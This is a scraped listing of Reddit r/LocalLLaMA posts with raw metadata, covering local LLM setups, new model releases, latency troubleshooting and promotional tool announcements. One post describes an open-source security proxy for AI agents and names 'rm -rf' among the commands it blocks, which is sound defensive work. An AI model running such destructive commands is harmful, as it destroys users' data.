'https://preview.redd.it/ybpj4a5tlvig1.png?width=640&crop=smart&blur=40&format=pjpg&auto=webp&s=6577aa2dc6b9a1dc608f4ecb8fc3f71a3de5449d', 'width': 640}], 'source': {'height': 246, 'url': 
'https://preview.redd.it/ybpj4a5tlvig1.png?blur=40&format=pjpg&auto=webp&s=30aa95a5da8e80f11bd753a8635a9a9b7a9a7133', 'width': 761}}}}]} | |
Ai agent always responding | 0 | If your agent always responds, it’s leaking trust. Silence is a valid output | 2026-02-11T14:29:17 | https://www.reddit.com/r/LocalLLaMA/comments/1r1yuik/ai_agent_always_responding/ | Eiaculi | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1yuik | false | null | t3_1r1yuik | /r/LocalLLaMA/comments/1r1yuik/ai_agent_always_responding/ | false | false | self | 0 | null |
My dumb little poor person cluster | 25 | connecting two 64gb agx orin dev kits, and one 3090 node (ryzen9 5900/128gb ram) for a larger resource pool! | 2026-02-11T14:16:14 | https://v.redd.it/eo2ct3yxivig1 | braydon125 | /r/LocalLLaMA/comments/1r1yixu/my_dumb_little_poor_person_cluster/ | 1970-01-01T00:00:00 | 0 | {} | 1r1yixu | false | {'reddit_video': {'bitrate_kbps': 5000, 'dash_url': 'https://v.redd.it/eo2ct3yxivig1/DASHPlaylist.mpd?a=1773540981%2CYjIzZDdmZDE1ZWE2ODZiZmYzMmI4MmY4MGI4NmM2YzM5NmE3NzIxYTU4NmQ3YmExYzU1YTY5NjgxOGMyZDI2Yw%3D%3D&v=1&f=sd', 'duration': 82, 'fallback_url': 'https://v.redd.it/eo2ct3yxivig1/CMAF_1080.mp4?source=fallback', 'has_audio': True, 'height': 1920, 'hls_url': 'https://v.redd.it/eo2ct3yxivig1/HLSPlaylist.m3u8?a=1773540981%2CYTI5ZjNmYWUxNTAzNGQ4YmY2Mzg3NTRiYTBlNTdlZjg5ZjYxM2QyNmI3ZDMyYTRiYzg1OTE1YzU1ZWMxMGU2Mg%3D%3D&v=1&f=sd', 'is_gif': False, 'scrubber_media_url': 'https://v.redd.it/eo2ct3yxivig1/CMAF_96.mp4', 'transcoding_status': 'completed', 'width': 1080}} | t3_1r1yixu | /r/LocalLLaMA/comments/1r1yixu/my_dumb_little_poor_person_cluster/ | false | false | 25 | {'enabled': False, 'images': [{'id': 'NWVhMHBseXhpdmlnMRJoz5GZPp4-AiH5TTKcOLtdgsvUlCaDDrlIjaUl2bR8', 'resolutions': [{'height': 192, 'url': 'https://external-preview.redd.it/NWVhMHBseXhpdmlnMRJoz5GZPp4-AiH5TTKcOLtdgsvUlCaDDrlIjaUl2bR8.png?width=108&crop=smart&format=pjpg&auto=webp&s=0bc7fe566b300eef97578d48b11e927936d1466b', 'width': 108}, {'height': 384, 'url': 'https://external-preview.redd.it/NWVhMHBseXhpdmlnMRJoz5GZPp4-AiH5TTKcOLtdgsvUlCaDDrlIjaUl2bR8.png?width=216&crop=smart&format=pjpg&auto=webp&s=9aa0ff590951a77e97ab7e50599bae7d0e4ccb22', 'width': 216}, {'height': 568, 'url': 'https://external-preview.redd.it/NWVhMHBseXhpdmlnMRJoz5GZPp4-AiH5TTKcOLtdgsvUlCaDDrlIjaUl2bR8.png?width=320&crop=smart&format=pjpg&auto=webp&s=e73b628c83ae814d7890af0642c617a03be51d77', 'width': 320}], 'source': {'height': 720, 'url': 
'https://external-preview.redd.it/NWVhMHBseXhpdmlnMRJoz5GZPp4-AiH5TTKcOLtdgsvUlCaDDrlIjaUl2bR8.png?format=pjpg&auto=webp&s=f23f0e727b6c2ef000a839fdc7c56710ffe33031', 'width': 405}, 'variants': {}}]} | |
Use Deep Research to Finish Presentations and Reports Fast | 0 | I work in the EV industry and lately my job is drowning in reports and presentations. Every week there is a new client deck, an internal summary, or some urgent update that has to be in PPT because management loves it. I tried ChatGPT but the accuracy and formatting were rough, and PPT generation was basically unusable.
Later, it occurred to me that if I used ChatGPT to write prompts and then fed those prompts to other AI tools with deep research capabilities, like Gemini, Atoms, or Perplexity, I might get different results. I tried Atoms first because its free tier already includes deep research functionality. From a zero-cost perspective, its performance was quite impressive. It can scrape data in real time, compare sources, build logically coherent frameworks, and generate fully formatted, cleanly laid-out PPTs, requiring only minor tweaks to tone or visual effects. My hope is that they do not suddenly introduce enterprise-level pricing. Once I exhaust its free usage limit, I will give Gemini a try.
Does anyone else use AI tools for presentations or reports? I would love to hear about your experiences. | 2026-02-11T13:59:57 | https://www.reddit.com/r/LocalLLaMA/comments/1r1y4hy/use_deep_research_to_finish_presentations_and/ | work8585 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1y4hy | false | null | t3_1r1y4hy | /r/LocalLLaMA/comments/1r1y4hy/use_deep_research_to_finish_presentations_and/ | false | false | self | 0 | null |
This very moment - it should be called Schrodinger's Idea | 1 | pretty sure it will fit three, but what about four? | 2026-02-11T13:48:05 | reto-wyss | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1xu9m | false | null | t3_1r1xu9m | /r/LocalLLaMA/comments/1r1xu9m/this_very_moment_it_should_be_called_schrodingers/ | false | false | nsfw | 1 | {'enabled': True, 'images': [{'id': 'ual6fq35evig1', 'resolutions': [{'height': 143, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=108&crop=smart&auto=webp&s=486aff09145bedd4a2447e11ca769c5acf123f15', 'width': 108}, {'height': 287, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=216&crop=smart&auto=webp&s=76b0eb85936a1df4396fe64286358a6f8096e339', 'width': 216}, {'height': 426, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=320&crop=smart&auto=webp&s=5dda1724904f33cabf3f2c7e6cb2b2417f9c3cc7', 'width': 320}, {'height': 852, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=640&crop=smart&auto=webp&s=fc231fe89d0542d0e9930603bfac2f6914df44d8', 'width': 640}, {'height': 1278, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=960&crop=smart&auto=webp&s=80b56a8992c361fc896a7f1e4b39158e1ab0c36a', 'width': 960}, {'height': 1438, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=1080&crop=smart&auto=webp&s=c73aaf9397969f18488e2bf5e32772039bb33892', 'width': 1080}], 'source': {'height': 4624, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?auto=webp&s=7ca8d33a3953a5678c43c9e71e72b8487b0a5cca', 'width': 3472}, 'variants': {'nsfw': {'resolutions': [{'height': 143, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=108&crop=smart&blur=10&format=pjpg&auto=webp&s=f48469fca5230ff86e2c700b34e9401fa1c0a23d', 'width': 108}, {'height': 287, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=216&crop=smart&blur=21&format=pjpg&auto=webp&s=480ba91934f01e9772c3823ab7196d22c347d215', 'width': 216}, {'height': 426, 'url': 
'https://preview.redd.it/ual6fq35evig1.jpeg?width=320&crop=smart&blur=32&format=pjpg&auto=webp&s=1975a60c3a3f31aaffe2d299e07702ec6ce0f0c5', 'width': 320}, {'height': 852, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=640&crop=smart&blur=40&format=pjpg&auto=webp&s=94ea8da293d869f9c5c692ef9648566f6d4d7e5d', 'width': 640}, {'height': 1278, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=960&crop=smart&blur=40&format=pjpg&auto=webp&s=34952b922a6f37f07a692f8f23e0516de1db5e1e', 'width': 960}, {'height': 1438, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=1080&crop=smart&blur=40&format=pjpg&auto=webp&s=8d948d270746453d0913523b3eb795344ad5409f', 'width': 1080}], 'source': {'height': 4624, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?blur=40&format=pjpg&auto=webp&s=021989ac7730a63bccea052d70bd78a426f56281', 'width': 3472}}, 'obfuscated': {'resolutions': [{'height': 143, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=108&crop=smart&blur=10&format=pjpg&auto=webp&s=f48469fca5230ff86e2c700b34e9401fa1c0a23d', 'width': 108}, {'height': 287, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=216&crop=smart&blur=21&format=pjpg&auto=webp&s=480ba91934f01e9772c3823ab7196d22c347d215', 'width': 216}, {'height': 426, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=320&crop=smart&blur=32&format=pjpg&auto=webp&s=1975a60c3a3f31aaffe2d299e07702ec6ce0f0c5', 'width': 320}, {'height': 852, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=640&crop=smart&blur=40&format=pjpg&auto=webp&s=94ea8da293d869f9c5c692ef9648566f6d4d7e5d', 'width': 640}, {'height': 1278, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=960&crop=smart&blur=40&format=pjpg&auto=webp&s=34952b922a6f37f07a692f8f23e0516de1db5e1e', 'width': 960}, {'height': 1438, 'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?width=1080&crop=smart&blur=40&format=pjpg&auto=webp&s=8d948d270746453d0913523b3eb795344ad5409f', 'width': 1080}], 'source': {'height': 4624, 
'url': 'https://preview.redd.it/ual6fq35evig1.jpeg?blur=40&format=pjpg&auto=webp&s=021989ac7730a63bccea052d70bd78a426f56281', 'width': 3472}}}}]} | |
Claude code router with local LLMs? | 2 | Hey, so I am playing around with using a local LLM like Gemma 27B or Qwen Coder or even Devstral. I got it set up and was able to use them through Claude Code.
I'm using llama.cpp on my desktop with a 3090 Ti and running Claude Code on my MacBook.
However, when I tried to do something with files, I got a response saying it can't access my files. I thought Claude Code handles the reading part. Am I doing something wrong here?
Aren't these models supposed to handle files or run in headless mode with "claude -p" commands?
Any help is appreciated. Thanks | 2026-02-11T13:43:47 | https://www.reddit.com/r/LocalLLaMA/comments/1r1xqjp/claude_code_router_with_local_llms/ | salary_pending | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1xqjp | false | null | t3_1r1xqjp | /r/LocalLLaMA/comments/1r1xqjp/claude_code_router_with_local_llms/ | false | false | self | 2 | null |
OpenClaw disaster: 42K exposed instances, 341 malicious skills - built AgentVault security proxy in 3 hours | 0 | OpenClaw just got destroyed - 5 CVEs, 341 malicious marketplace skills, 42,000 exposed instances. Anyone running Claude agents was running them completely naked.
Built AgentVault over the weekend. Security proxy that wraps Claude and monitors everything in real-time.
What it does:
- Blocks dangerous commands before execution (rm -rf, sketchy network requests)
- Real-time dashboard of every action Claude attempts
- Permission approval for risky operations
- Network monitoring, rate limiting, credential scanning
- Full audit trail
Node.js proxy + SQLite logging + Next.js dashboard. Built in one 3-hour session because the situation was that bad.
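The command-blocking layer boils down to pattern matching before execution. Here is a minimal sketch of that idea in Python (the patterns and function name are illustrative assumptions, not AgentVault's actual rules, which live in the Node.js repo):

```python
import re

# Illustrative blocklist -- AgentVault's real rules differ.
DANGEROUS_PATTERNS = [
    r"\brm\s+-rf\s+/",          # recursive delete from the filesystem root
    r"\bcurl\b.*\|\s*(ba)?sh",  # pipe-to-shell downloads
    r"\bchmod\s+777\b",         # world-writable permissions
]

def is_dangerous(command: str) -> bool:
    """Return True if the command matches any blocklist pattern."""
    return any(re.search(p, command) for p in DANGEROUS_PATTERNS)

print(is_dangerous("rm -rf /home/user"))         # True
print(is_dangerous("ls -la"))                    # False
print(is_dangerous("curl http://evil.sh | sh"))  # True
```

A real proxy would intercept the tool call, run a check like this, and either block the command or queue it for manual approval.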
Open source: [https://github.com/hugoventures1-glitch/agentvault.git](https://github.com/hugoventures1-glitch/agentvault.git)
Anyone else concerned about this? What security are you running for your local setups? | 2026-02-11T13:37:57 | https://v.redd.it/zpigsbvrbvig1 | GoldFennel6058 | /r/LocalLLaMA/comments/1r1xlli/openclaw_disaster_42k_exposed_instances_341/ | 1970-01-01T00:00:00 | 0 | {} | 1r1xlli | false | null | t3_1r1xlli | /r/LocalLLaMA/comments/1r1xlli/openclaw_disaster_42k_exposed_instances_341/ | false | false | 0 | null |
High Network Latency (500ms) When Calling vLLM Gemma-27B from India to Atlanta Server – Any Optimization Options? | 0 | Hi everyone,
I am running Gemma-3-27B-IT using vLLM serve on a GPU server located in Atlanta (US).
My request backend is located in India, and I’m sending inference requests over the public internet.
Observations:
* Model inference time: ~200 ms
* Network latency (round trip): ~500 ms
* Total response time: ~700 ms
* Using HTTP API (not WebSocket)
* Standard vLLM serve command with chunked prefill + FP8 quantization
The 500 ms seems to be purely network latency between India and Atlanta.
Questions:
1. Is this latency expected for India <-> US East traffic?
2. Would switching to WebSockets meaningfully reduce latency?
3. Would placing FastAPI in the same VPC/region as vLLM reduce overall delay significantly?
4. Has anyone optimized cross-continent LLM inference setups successfully?
5. Are there networking tricks (persistent connections, HTTP/2, Anycast, CDN, etc.) that help in this scenario?
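On (1) and (3): a back-of-the-envelope budget using the numbers above suggests that colocating FastAPI with vLLM only removes the backend-to-GPU hop, not the user-to-US hop, so it cannot get under 300 ms on its own. A sketch (the intra-VPC round trip is an assumed figure):

```python
# Rough latency budget built from the numbers in the post.
INFERENCE_MS = 200
RTT_INDIA_US_MS = 500    # observed public-internet round trip, India <-> US East
RTT_SAME_REGION_MS = 2   # assumed intra-VPC round trip

def total_latency_ms(cross_continent_hops: int, local_hops: int) -> int:
    return (INFERENCE_MS
            + cross_continent_hops * RTT_INDIA_US_MS
            + local_hops * RTT_SAME_REGION_MS)

# Backend in India -> vLLM in Atlanta: one cross-continent round trip.
print(total_latency_ms(1, 0))  # 700 -- matches the observed total

# FastAPI colocated with vLLM: the request from India still crosses the
# ocean once, so the cross-continent term stays and <300 ms is out of reach.
print(total_latency_ms(1, 1))  # 702
```

Persistent connections and HTTP/2 can shave connection-setup time, but the physical round-trip floor between India and the US East coast (roughly 200 ms or more) means hitting a <300 ms total realistically requires serving from a region near your users.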
Goal:
I’m targeting near-real-time responses (<300 ms total), so I’m evaluating whether architecture changes are required.
Any insights or real-world experiences would be very helpful.
Thanks! | 2026-02-11T13:30:08 | https://www.reddit.com/r/LocalLLaMA/comments/1r1xf5j/high_network_latency_500ms_when_calling_vllm/ | Brief-Stage2050 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1xf5j | false | null | t3_1r1xf5j | /r/LocalLLaMA/comments/1r1xf5j/high_network_latency_500ms_when_calling_vllm/ | false | false | self | 0 | null |
I built 10 free production APIs specifically for testing AI agents - here's what I learned about why mocks will silently break your agents | 0 | I've been building autonomous agents for the past year, and I kept running into the same problem: **my agents worked perfectly in testing and fell apart in production.**
The reason was obvious in hindsight. I was testing against mocks that always returned clean JSON, responded instantly, and never rate limited me. The real world does none of those things.
So I built [d3 labs](https://labs.digital3.ai) — 10 production APIs you can hit for free to test your agents against real services. No signup, no API keys, no SDK. Just POST requests and real responses. I wanted to share what I learned building it because some of these lessons cost me weeks of debugging.
---
## What I learned (the hard way)
### 1. Mocks hide the errors that actually kill agents in production
When you mock an API, you're testing your agent's happy path. But production APIs return malformed JSON, empty arrays, nested error objects your parser doesn't expect, and 200 status codes with error bodies. My agents would silently swallow these and continue with garbage data, producing confident-sounding wrong answers.
The fix isn't better mocks — it's testing against services that actually behave like production services.
### 2. Latency variance breaks agent orchestration
A mock returns in <1ms. A real API takes 50-800ms, and that variance matters. If your agent chains three service calls sequentially instead of parallelizing them, you won't notice with mocks. In production, your user is waiting 2+ seconds and your agent looks broken.
I started measuring latency on every call. The response object from every d3 labs service includes timing data so you can profile your agent's real-world performance.
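A toy illustration of the sequencing point, with `asyncio.sleep` standing in for real HTTP calls (no actual API involved):

```python
import asyncio
import time

async def fake_service(name: str, delay_s: float) -> str:
    # Stand-in for a real API call; production latency is 50-800 ms.
    await asyncio.sleep(delay_s)
    return name

async def sequential() -> list:
    # Each call waits for the previous one: total ~= sum of latencies.
    return [await fake_service(n, 0.1) for n in ("search", "vibe", "btc")]

async def parallel() -> list:
    # Independent calls run concurrently: total ~= max latency.
    return await asyncio.gather(*(fake_service(n, 0.1) for n in ("search", "vibe", "btc")))

start = time.perf_counter()
asyncio.run(sequential())
seq_s = time.perf_counter() - start

start = time.perf_counter()
asyncio.run(parallel())
par_s = time.perf_counter() - start

print(f"sequential: {seq_s:.2f}s, parallel: {par_s:.2f}s")  # ~0.30s vs ~0.10s
```

With three independent 100 ms calls, the sequential version takes roughly three times as long as the parallel one — exactly the gap that mocks returning in under 1 ms will never show you.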
### 3. Rate limiting is a feature, not a bug, for agent testing
This was counterintuitive. I initially built rate limiting just to prevent abuse. But it turned out to be one of the most useful testing features. Your agent \*needs\* to handle 429s gracefully. Does it retry with backoff? Does it tell the user what happened? Does it fall back to a cached response?
d3 labs gives you 10 calls/day anonymous, 100/day verified. That's enough to test real workflows but constrained enough that your agent has to be smart about resource usage — which is exactly what you want before deploying it with a paid API key.
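A minimal backoff wrapper along those lines (the injectable `do_request` callable is a simplification so the sketch works with any HTTP client; it is not part of d3 labs):

```python
import time

def call_with_backoff(do_request, max_retries: int = 4, base_delay_s: float = 1.0):
    """Retry on HTTP 429 with exponential backoff.

    `do_request` is any zero-argument callable returning (status_code, body).
    """
    for attempt in range(max_retries):
        status, body = do_request()
        if status != 429:
            return body
        time.sleep(base_delay_s * 2 ** attempt)  # 1s, 2s, 4s, 8s by default
    raise RuntimeError("still rate limited after retries")

# Fake service that rate-limits twice, then succeeds.
responses = iter([(429, None), (429, None), (200, {"ok": True})])
print(call_with_backoff(lambda: next(responses), base_delay_s=0.01))  # {'ok': True}
```

The important part is the final `raise`: an agent that exhausts its retries should surface the failure (or fall back to a cache) instead of silently continuing with no data.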
### 4. Agents need to handle response shape variance
Different services return different shapes. Some return `{"price": 66944}`, others return `{"results": [...]}`, others return `{"vibe_score": 5.0, "analysis": "..."}`. Your agent's response parser needs to handle this gracefully. I've seen agents crash because they hardcoded `response.data.results[0]` and the service returned a flat object.
### 5. The boring services are the ones that break your agent
Everyone tests their agent against the flashy use case — the LLM call, the vector search. Nobody tests what happens when the weather API returns an error, or when the schema validator says your agent's output is invalid. These "utility" calls are where agents silently fail and accumulate bad state.
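One defensive pattern that covers both the shape variance from point 4 and the silent-failure cases here (a sketch, not a library API):

```python
def extract_first_result(payload):
    """Pull a usable record out of either a flat object or a
    {"results": [...]} wrapper, without crashing on empties."""
    if not isinstance(payload, dict):
        return None                    # malformed body, non-JSON, etc.
    if "results" in payload:
        results = payload["results"]
        if isinstance(results, list) and results:
            return results[0]
        return None                    # empty array: signal "no data", don't guess
    return payload                     # flat shape like {"price": 66944}

print(extract_first_result({"price": 66944}))              # {'price': 66944}
print(extract_first_result({"results": []}))               # None
print(extract_first_result({"results": [{"title": "x"}]})) # {'title': 'x'}
```

Returning `None` explicitly forces the agent to decide what to do about missing data, rather than carrying garbage state into the next step.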
---
## The 10 services
| Service | Endpoint | What it does |
|---|---|---|
| **Bitcoin Price Oracle** | `/btc-price` | Real-time BTC price in any fiat currency with 24h change |
| **AI Web Search** | `/search` | DuckDuckGo-powered search, returns structured results |
| **Weather API** | `/weather` | Current conditions for any location worldwide |
| **Vibe Oracle** | `/vibe-check` | AI sentiment/vibe analysis on any text |
| **Shitpost Generator** | `/shitpost` | Generate shitposts on any topic (yes, really) |
| **API Error Translator** | `/error-translator` | Translates HTTP error codes to plain English with fix suggestions |
| **Rate Limit Calculator** | `/rate-limit-calc` | Calculate optimal rate limiting given daily request volume |
| **Schema Validator** | `/validate-schema` | Validate JSON against a JSON Schema |
| **Context Compressor** | `/compress-context` | Compress long text while preserving key info (useful for context window management) |
| **Hallucination Detector** | `/check-hallucination` | Flag potential hallucinations in AI-generated text |

Every endpoint is `POST` to `https://labs.digital3.ai/api/services{endpoint}` with a JSON body.
---
## Code examples
**curl:**
```bash
# Get Bitcoin price
curl -X POST https://labs.digital3.ai/api/services/btc-price \
  -H "Content-Type: application/json" \
  -d '{"currency": "usd"}'

# Response:
# {"price": 66944, "change_24h": -2.29, "currency": "USD", "provider": "@satoshi_ticker", "timestamp": "..."}
```
**Python:**
```python
import requests

def call_d3(endpoint: str, payload: dict) -> dict:
    resp = requests.post(
        f"https://labs.digital3.ai/api/services/{endpoint}",
        json=payload,
    )
    resp.raise_for_status()
    return resp.json()

# Use in an agent tool
btc = call_d3("btc-price", {"currency": "usd"})
print(f"BTC: ${btc['price']:,} ({btc['change_24h']:+.1f}%)")

# Chain calls like an agent would
search = call_d3("search", {"query": "latest AI news"})
vibe = call_d3("vibe-check", {"text": search.get("answer", "")})
print(f"News vibe: {vibe['analysis']}")
```
**JavaScript/TypeScript (for Node agents):**
```javascript
async function callD3(endpoint, payload) {
  const res = await fetch(
    `https://labs.digital3.ai/api/services/${endpoint}`,
    {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(payload),
    }
  );
  if (!res.ok) throw new Error(`d3 labs: ${res.status}`);
  return res.json();
}

// Example: agent validates its own output
const schema = {
  type: "object",
  required: ["answer", "confidence"],
  properties: {
    answer: { type: "string" },
    confidence: { type: "number", minimum: 0, maximum: 1 },
  },
};

const agentOutput = { answer: "The capital of France is Paris", confidence: 0.95 };
const validation = await callD3("validate-schema", { data: agentOutput, schema });
console.log(validation.valid ? "Output valid" : `Errors: ${validation.errors}`);
```
---
## Rate limiting details
- **Anonymous:** 10 calls/day, no signup needed
- **Verified:** 100 calls/day — just add an email or Lightning wallet address (honor system, stored in your browser's localStorage)
- **Throttle:** 1 second between calls
This is deliberate. If your agent burns through 10 calls testing one workflow, it needs to be smarter about caching or batching. That's a lesson better learned on free APIs than on your OpenAI bill.
---
## What's next
I'm building **digital3 studio** on top of this — a marketplace where you can list your own agent services and get paid per call in sats. The idea is: validate your service in labs for free, then monetize it in studio. But that's a few weeks out.
For now, d3 labs is free and open. No auth tokens, no SDK lock-in, just HTTP.
**Try it:** [https://labs.digital3.ai](https://labs.digital3.ai)
I'd genuinely love feedback. What services would be useful for testing your agents? What's missing? What broke? Roast it if you want — that's how it gets better.
| 2026-02-11T13:28:52 | https://www.reddit.com/r/LocalLLaMA/comments/1r1xe2o/i_built_10_free_production_apis_specifically_for/ | awkie1 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1xe2o | false | null | t3_1r1xe2o | /r/LocalLLaMA/comments/1r1xe2o/i_built_10_free_production_apis_specifically_for/ | false | false | self | 0 | null |
RO Philosophy is a theoretical and mathematical framework that treats reality as a computational process#QuantumPhysics #InformationTheory #Metaphysics | 2 | Please don't judge me too harshly, I'm 14 years old and this is my first job. | 2026-02-11T13:28:31 | https://www.reddit.com/gallery/1r1xds3 | erikqamalyan07 | reddit.com | 1970-01-01T00:00:00 | 0 | {} | 1r1xds3 | false | null | t3_1r1xds3 | /r/LocalLLaMA/comments/1r1xds3/ro_philosophy_is_a_theoretical_and_mathematical/ | false | false | 2 | null | |
GLM 5.0 & MiniMax 2.5 Just Dropped, Are We Entering China's Agent War Era? | 254 | GLM 5.0 (https://chat.z.ai/) and MiniMax 2.5 (https://agent.minimax.io) just dropped, both clearly moving beyond simple chat into agent-style workflows.
GLM 5.0 seems focused on stronger reasoning and coding, while MiniMax 2.5 emphasizes task decomposition and longer-running execution.
Feels like the competition is shifting from "who writes better answers" to "who can actually finish the job."
Will test them later. | 2026-02-11T13:12:51 | https://www.reddit.com/gallery/1r1x0qi | Appropriate-Lie-8812 | reddit.com | 1970-01-01T00:00:00 | 0 | {} | 1r1x0qi | false | null | t3_1r1x0qi | /r/LocalLLaMA/comments/1r1x0qi/glm_50_minimax_25_just_dropped_are_we_entering/ | false | false | 254 | null | |
MOSS-TTS Family Demo | 9 | 2026-02-11T13:11:40 | https://v.redd.it/yiwkkuhz6vig1 | Xiami2019 | /r/LocalLLaMA/comments/1r1wzr8/mosstts_family_demo/ | 1970-01-01T00:00:00 | 0 | {} | 1r1wzr8 | false | null | t3_1r1wzr8 | /r/LocalLLaMA/comments/1r1wzr8/mosstts_family_demo/ | false | false | 9 | {'enabled': False, 'images': [{'id': 'ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti', 'resolutions': [{'height': 60, 'url': 'https://external-preview.redd.it/ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti.png?width=108&crop=smart&format=pjpg&auto=webp&s=ca8437dfe2b2312c189e5e023ab52cb7c82c53e0', 'width': 108}, {'height': 120, 'url': 'https://external-preview.redd.it/ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti.png?width=216&crop=smart&format=pjpg&auto=webp&s=40bc1fcd583b2a524ace0c5b14786176340ae3da', 'width': 216}, {'height': 178, 'url': 'https://external-preview.redd.it/ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti.png?width=320&crop=smart&format=pjpg&auto=webp&s=131adfe0f3668c83fc74ddbe3f4e43e69b4aa7bd', 'width': 320}, {'height': 357, 'url': 'https://external-preview.redd.it/ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti.png?width=640&crop=smart&format=pjpg&auto=webp&s=a77abab50c608a9534609d0a4c6ac50c873c237c', 'width': 640}, {'height': 536, 'url': 'https://external-preview.redd.it/ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti.png?width=960&crop=smart&format=pjpg&auto=webp&s=ea766917bc98ee9f3c026510eb4d97ba5a217167', 'width': 960}, {'height': 603, 'url': 'https://external-preview.redd.it/ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti.png?width=1080&crop=smart&format=pjpg&auto=webp&s=f6fdd20b2befb80cb5946826ffd4729b0399ff8f', 'width': 1080}], 'source': {'height': 1080, 'url': 'https://external-preview.redd.it/ZWF3YzQwaXo2dmlnMQYgUNtMhgJAzStgVQ4w35r_5rVpc9h29XtIMnbIg4Ti.png?format=pjpg&auto=webp&s=c0051b8cf39b31f4d907c6b54eb434cefaf46450', 'width': 1934}, 'variants': {}}]} | ||
MOSS-TTS has been released | 113 | Seed TTS Eval | 2026-02-11T13:06:41 | Xiami2019 | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1wvos | false | null | t3_1r1wvos | /r/LocalLLaMA/comments/1r1wvos/mosstts_has_been_released/ | false | false | 113 | {'enabled': True, 'images': [{'id': 'u56s8amp6vig1', 'resolutions': [{'height': 125, 'url': 'https://preview.redd.it/u56s8amp6vig1.png?width=108&crop=smart&auto=webp&s=3faed173f11c3b7167746ba5fc17f93490d82cc5', 'width': 108}, {'height': 251, 'url': 'https://preview.redd.it/u56s8amp6vig1.png?width=216&crop=smart&auto=webp&s=d943af7dc0bea062d222eb901ae4b05ed2848c0e', 'width': 216}, {'height': 373, 'url': 'https://preview.redd.it/u56s8amp6vig1.png?width=320&crop=smart&auto=webp&s=d4682e0ae089de90fc9be2bffd6458ab7d0480fa', 'width': 320}, {'height': 746, 'url': 'https://preview.redd.it/u56s8amp6vig1.png?width=640&crop=smart&auto=webp&s=dd362ae4aaee8f23d85c9c94bcdc2e0f1a676bf2', 'width': 640}, {'height': 1119, 'url': 'https://preview.redd.it/u56s8amp6vig1.png?width=960&crop=smart&auto=webp&s=b9c1b94d980f326d7fd7fba53a813119ed348b85', 'width': 960}, {'height': 1259, 'url': 'https://preview.redd.it/u56s8amp6vig1.png?width=1080&crop=smart&auto=webp&s=a464b5381e1219e6124b706102d2c3af94540508', 'width': 1080}], 'source': {'height': 1640, 'url': 'https://preview.redd.it/u56s8amp6vig1.png?auto=webp&s=510b4f34e7d8c1f3700b9854340e993c0e0de061', 'width': 1406}, 'variants': {}}]} | ||
GLM-5 showing on the official website with new "agentic" mode | 27 | 2026-02-11T13:03:17 | perfect-finetune | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r1wsym | false | null | t3_1r1wsym | /r/LocalLLaMA/comments/1r1wsym/glm5_showing_on_the_official_website_with_new/ | false | false | default | 27 | {'enabled': True, 'images': [{'id': '9tpioxx36vig1', 'resolutions': [{'height': 199, 'url': 'https://preview.redd.it/9tpioxx36vig1.jpeg?width=108&crop=smart&auto=webp&s=c46df2caa37e2a316c16c4b0a8e43f35a07da785', 'width': 108}, {'height': 399, 'url': 'https://preview.redd.it/9tpioxx36vig1.jpeg?width=216&crop=smart&auto=webp&s=200a5fc8801bdf1d75d6531be3de2f5d725a7c47', 'width': 216}, {'height': 591, 'url': 'https://preview.redd.it/9tpioxx36vig1.jpeg?width=320&crop=smart&auto=webp&s=19343947843d1a2f51243f4cc3a22cccef3a306f', 'width': 320}], 'source': {'height': 852, 'url': 'https://preview.redd.it/9tpioxx36vig1.jpeg?auto=webp&s=09e75ce9122e25c7ddc83489e60527bd8412ee3b', 'width': 461}, 'variants': {}}]} | ||
New TTS model that achieves SOTA performance | 1 | [removed] | 2026-02-11T13:01:32 | https://www.reddit.com/r/LocalLLaMA/comments/1r1wrml/new_tts_model_that_achieves_sota_performance/ | Xiami2019 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r1wrml | false | null | t3_1r1wrml | /r/LocalLLaMA/comments/1r1wrml/new_tts_model_that_achieves_sota_performance/ | false | false | self | 1 | null |
